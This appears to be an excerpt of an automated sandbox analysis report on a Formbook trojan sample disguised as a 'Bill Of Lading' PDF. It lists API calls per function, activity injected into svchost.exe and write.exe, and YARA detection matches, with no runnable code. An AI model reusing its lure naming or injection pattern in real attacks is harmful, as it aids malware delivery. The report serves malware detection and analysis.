            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004120380_2_00412038
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047E1FA0_2_0047E1FA
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0041A46B0_2_0041A46B
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0041240C0_2_0041240C
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004045E00_2_004045E0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004128180_2_00412818
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0047CBF00_2_0047CBF0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044EBBC0_2_0044EBBC
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00412C380_2_00412C38
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0044ED9A0_2_0044ED9A
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00424F700_2_00424F70
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0041AF0D0_2_0041AF0D
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004271610_2_00427161
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004212BE0_2_004212BE
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004433900_2_00443390
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004433910_2_00443391
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0041D7500_2_0041D750
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004037E00_2_004037E0
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_004278590_2_00427859
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0040F8900_2_0040F890
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_0042397B0_2_0042397B
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00409A400_2_00409A40
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00411B630_2_00411B63
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_00423EBF0_2_00423EBF
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: 0_2_04023A380_2_04023A38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185831_2_00418583
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100031_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040282F1_2_0040282F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028301_2_00402830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0831_2_0040E083
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004032101_2_00403210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EAF31_2_0042EAF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CDC1_2_00402CDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CE01_2_00402CE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025C01_2_004025C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDDB1_2_0040FDDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDE31_2_0040FDE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041674F1_2_0041674F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167531_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B14E785_2_05B14E78
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1D5955_2_05B1D595
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1D5995_2_05B1D599
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16C215_2_05B16C21
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16C295_2_05B16C29
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B14EC95_2_05B14EC9
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B16E495_2_05B16E49
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B359395_2_05B35939
            Source: C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exeCode function: 5_2_05B1F3C95_2_05B1F3C9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F24466_2_045F2446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045314606_2_04531460
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF43F6_2_045FF43F
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EE4F66_2_045EE4F6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F75716_2_045F7571
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045405356_2_04540535
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DD5B06_2_045DD5B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046005916_2_04600591
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F16CC6_2_045F16CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455C6E06_2_0455C6E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045647506_2_04564750
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045407706_2_04540770
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453C7C06_2_0453C7C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF7B06_2_045FF7B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EF0CC6_2_045EF0CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045470C06_2_045470C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F70E96_2_045F70E9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FF0E06_2_045FF0E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045C81586_2_045C8158
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0460B16B6_2_0460B16B
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452F1726_2_0452F172
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0457516C6_2_0457516C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DA1186_2_045DA118
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045301006_2_04530100
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F81CC6_2_045F81CC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046001AA6_2_046001AA
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454B1B06_2_0454B1B0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E02746_2_045E0274
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455B2C06_2_0455B2C0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455D2F06_2_0455D2F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E12ED6_2_045E12ED
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045452A06_2_045452A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FA3526_2_045FA352
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0452D34C6_2_0452D34C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F132D6_2_045F132D
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_046003E66_2_046003E6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454E3F06_2_0454E3F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0458739A6_2_0458739A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04540C006_2_04540C00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B9C326_2_045B9C32
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04530CF26_2_04530CF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFCF26_2_045FFCF2
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045E0CB56_2_045E0CB5
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F1D5A6_2_045F1D5A
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04543D406_2_04543D40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F7D736_2_045F7D73
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454AD006_2_0454AD00
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455FDC06_2_0455FDC0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453ADE06_2_0453ADE0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04558DBF6_2_04558DBF
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04540E596_2_04540E59
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FEE266_2_045FEE26
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FEEDB6_2_045FEEDB
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04552E906_2_04552E90
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FCE936_2_045FCE93
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04549EB06_2_04549EB0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B4F406_2_045B4F40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFF096_2_045FFF09
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04560F306_2_04560F30
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04582F286_2_04582F28
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04532FC86_2_04532FC8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04541F926_2_04541F92
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFFB16_2_045FFFB1
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045428406_2_04542840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0454A8406_2_0454A840
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045AD8006_2_045AD800
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0456E8F06_2_0456E8F0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045438E06_2_045438E0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045268B86_2_045268B8
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045499506_2_04549950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455B9506_2_0455B950
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045569626_2_04556962
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0460A9A66_2_0460A9A6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045429A06_2_045429A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFA496_2_045FFA49
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F7A466_2_045F7A46
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B3A6C6_2_045B3A6C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045EDAC66_2_045EDAC6
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0453EA806_2_0453EA80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045DDAAC6_2_045DDAAC
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_04585AA06_2_04585AA0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FAB406_2_045FAB40
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045FFB766_2_045FFB76
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045F6BD76_2_045F6BD7
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_045B5BF06_2_045B5BF0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0457DBF96_2_0457DBF9
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_0455FB806_2_0455FB80
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C1A106_2_023C1A10
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C32A06_2_023C32A0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C329C6_2_023C329C
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023C50D06_2_023C50D0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023DB6406_2_023DB640
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BCB506_2_023BCB50
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BABD06_2_023BABD0
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BC9306_2_023BC930
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_023BC9286_2_023BC928
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE4466_2_043AE446
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE5636_2_043AE563
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043ACC086_2_043ACC08
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AE8FD6_2_043AE8FD
            Source: C:\Windows\SysWOW64\write.exeCode function: 6_2_043AD9686_2_043AD968
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04575130 appears 36 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0452B970 appears 250 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 045AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 04587E54 appears 93 times
            Source: C:\Windows\SysWOW64\write.exeCode function: String function: 045BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 103 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0041718C appears 44 times
            Source: C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exeCode function: String function: 0040E6D0 appears 35 times
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1750552706.00000000049DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Bill Of Lading_MEDUVB935991.pdf.exe
            Source: Bill Of Lading_MEDUVB935991.pdf.exe, 00000000.00000003.1740156256.0000000004833000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Bill Of Lading_MEDUVB935991.pdf.exe
            Source: Bill Of Lading_MEDUVB935991.pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4198403561.00000000042A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
